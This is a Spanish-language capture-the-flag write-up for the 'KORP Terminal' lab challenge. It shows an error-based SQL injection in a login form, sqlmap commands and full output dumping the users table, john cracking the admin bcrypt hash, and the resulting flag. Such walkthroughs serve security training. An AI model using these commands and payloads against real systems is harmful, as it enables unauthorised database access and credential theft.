KORP Terminal

6 minutos de lectura

Se nos proporciona esta página web:

KORP Terminal 1

Solo nos permite iniciar sesión. Podemos probar una cuenta aleatoria, pero no tiene éxito:

KORP Terminal 2

KORP Terminal 3

Inyección de código SQL

Como no tenemos ningún código fuente y solo tenemos un formulario de inicio de sesión, intentemos inyectar código SQL. Podemos suponer que las credenciales se verifican contra una base de datos, que es muy probable que sea una base de datos SQL.

Si probamos una comilla simple, recibiremos un error:

KORP Terminal 4

KORP Terminal 5

Como se puede ver, estamos tratando con MariadB (una especie de administrador de bases de datos MySQL). Por lo tanto, estamos en el camino correcto.

Extracción de la base de datos

En este punto, podemos hacer uso de sqlmap para volcar la base de datos.Enumeraremos bases de datos, luego elegiremos una base de datos y listaremos las tablas, luego elegiremos una tabla y la volcaremos. Hay que tener en cuenta que podemos decirle a sqlmap que estamos tratando con MySQL, que el campo username es inyectable y que tenemos un SQLi basado en error.

$ sqlmap --url http://94.237.62.255:31811 --method POST --data 'username=*&password=x' --technique E --skip-waf --dbms MySQL --batch --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.9#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program  

[*] starting

custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[hh:mm:ss] [INFO] testing connection to the target URL
[hh:mm:ss] [WARNING] the web server responded with an HTTP error code (400) which could interfere with the results of the tests
[hh:mm:ss] [INFO] heuristic (basic) test shows that (custom) POST parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[hh:mm:ss] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[hh:mm:ss] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[hh:mm:ss] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[hh:mm:ss] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[hh:mm:ss] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[hh:mm:ss] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[hh:mm:ss] [WARNING] potential permission problems detected ('command denied')
[hh:mm:ss] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[hh:mm:ss] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[hh:mm:ss] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[hh:mm:ss] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[hh:mm:ss] [INFO] (custom) POST parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 136 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username='||(SELECT 0x6341556a WHERE 4610=4610 AND (SELECT 2781 FROM(SELECT COUNT(*),CONCAT(0x7170717071,(SELECT (ELT(2781=2781,1))),0x716a767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=x
---
[hh:mm:ss] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[hh:mm:ss] [INFO] fetching database names
[hh:mm:ss] [INFO] retrieved: 'information_schema'
[hh:mm:ss] [INFO] retrieved: 'test'
[hh:mm:ss] [INFO] retrieved: 'korp_terminal'
available databases [3]:
[*] information_schema
[*] korp_terminal
[*] test

[*] ending

$ sqlmap --url http://94.237.62.255:31811 --method POST --data 'username=*&password=x' --technique E --skip-waf --dbms MySQL --batch -D korp_terminal --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.9#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting

custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[hh:mm:ss] [INFO] testing connection to the target URL
[hh:mm:ss] [WARNING] the web server responded with an HTTP error code (400) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username='||(SELECT 0x6341556a WHERE 4610=4610 AND (SELECT 2781 FROM(SELECT COUNT(*),CONCAT(0x7170717071,(SELECT (ELT(2781=2781,1))),0x716a767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=x
---
[hh:mm:ss] [INFO] testing MySQL
[hh:mm:ss] [INFO] confirming MySQL
[hh:mm:ss] [WARNING] potential permission problems detected ('command denied')
[hh:mm:ss] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[hh:mm:ss] [INFO] fetching tables for database: 'korp_terminal'
[hh:mm:ss] [INFO] retrieved: 'users'
Database: korp_terminal
[1 table]
+-------+
| users |
+-------+

[*] ending

$ sqlmap --url http://94.237.62.255:31811 --method POST --data 'username=*&password=x' --technique E --skip-waf --dbms MySQL --batch -D korp_terminal -T use
rs --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.9#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting

custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[hh:mm:ss] [INFO] testing connection to the target URL
[hh:mm:ss] [WARNING] the web server responded with an HTTP error code (400) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username='||(SELECT 0x6341556a WHERE 4610=4610 AND (SELECT 2781 FROM(SELECT COUNT(*),CONCAT(0x7170717071,(SELECT (ELT(2781=2781,1))),0x716a767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=x
---
[hh:mm:ss] [INFO] testing MySQL
[hh:mm:ss] [INFO] confirming MySQL
[hh:mm:ss] [WARNING] potential permission problems detected ('command denied')
[hh:mm:ss] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[hh:mm:ss] [INFO] fetching columns for table 'users' in database 'korp_terminal'
[hh:mm:ss] [INFO] retrieved: 'id'
[hh:mm:ss] [INFO] retrieved: 'int(11)'
[hh:mm:ss] [INFO] retrieved: 'username'
[hh:mm:ss] [INFO] retrieved: 'varchar(255)'
[hh:mm:ss] [INFO] retrieved: 'password'
[hh:mm:ss] [INFO] retrieved: 'varchar(255)'
[hh:mm:ss] [INFO] fetching entries for table 'users' in database 'korp_terminal'
[hh:mm:ss] [INFO] retrieved: '1'
[hh:mm:ss] [INFO] retrieved: '$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.'
[hh:mm:ss] [INFO] retrieved: 'admin'
Database: korp_terminal
Table: users
[1 entry]
+----+--------------------------------------------------------------+----------+
| id | password                                                     | username |
+----+--------------------------------------------------------------+----------+
| 1  | $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. | admin    |
+----+--------------------------------------------------------------+----------+

[*] ending

Descifrado de hashes de contraseñas

Entonces, obtenemos el hash de la contraseña del usuario admin. Tratemos de romperlo usando john y rockyou.txt:

$ john --wordlist=$WORDLISTS/rockyou.txt <(echo '$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.')  
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Press 'q' or Ctrl-C to abort, almost any other key for status
password123      (?)
1g 0:00:01:49 100% 0.009120g/s 12.64p/s 12.64c/s 12.64C/s password123..peter
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Flag

En este punto, podemos iniciar sesión usando las credenciales admin:password123, y veremos la flag:

KORP Terminal 6

KORP Terminal 7

HTB{t3rm1n4l_cr4ck1ng_4nd_0th3r_sh3n4nig4n5}